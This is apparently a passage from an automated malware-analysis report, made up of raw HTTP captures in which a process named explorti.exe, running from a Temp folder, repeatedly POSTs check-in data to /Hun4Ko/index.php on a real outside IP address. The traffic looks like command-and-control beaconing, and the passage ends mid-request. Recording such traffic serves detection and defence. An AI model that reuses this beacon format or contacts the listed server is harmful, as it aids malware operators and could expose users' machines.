                    Jul 5, 2024 05:10:57.633583069 CEST804978877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:58.319137096 CEST804978877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:58.319327116 CEST4978880192.168.2.477.91.77.82

                    HTTP Request Dependency Graph

                    • 77.91.77.82

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.44973777.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:03.058995962 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:03.766336918 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:03.771302938 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:03.996983051 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.44973877.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:04.113904953 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:04.820863962 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:04.822462082 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:05.046885014 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.44973977.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:05.159713984 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:05.876519918 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:05.877672911 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:06.096573114 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.44974077.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:06.206985950 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:06.908555031 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:06.909427881 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:07.129904032 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.44974177.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:07.239581108 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:07.978058100 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:07.978868008 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:08.212229013 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.44974277.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:08.332653999 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:09.050707102 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:09.055381060 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:09.282841921 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.44974377.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:09.394258976 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:10.092967033 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:10.094006062 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:10.310858011 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.44974477.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:10.425515890 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:11.117185116 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:11.119334936 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:11.337167025 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.44974577.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:11.458595991 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:12.202783108 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:12.203501940 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:12.433974981 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.44974677.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:12.550483942 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:13.255688906 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:13.256418943 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:13.475923061 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.44974777.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:13.598210096 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:14.309160948 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:14.310110092 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:14.533269882 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.44974877.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:14.644329071 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:16.303675890 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:16.303908110 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:16.304158926 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:16.304296017 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:16.305944920 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
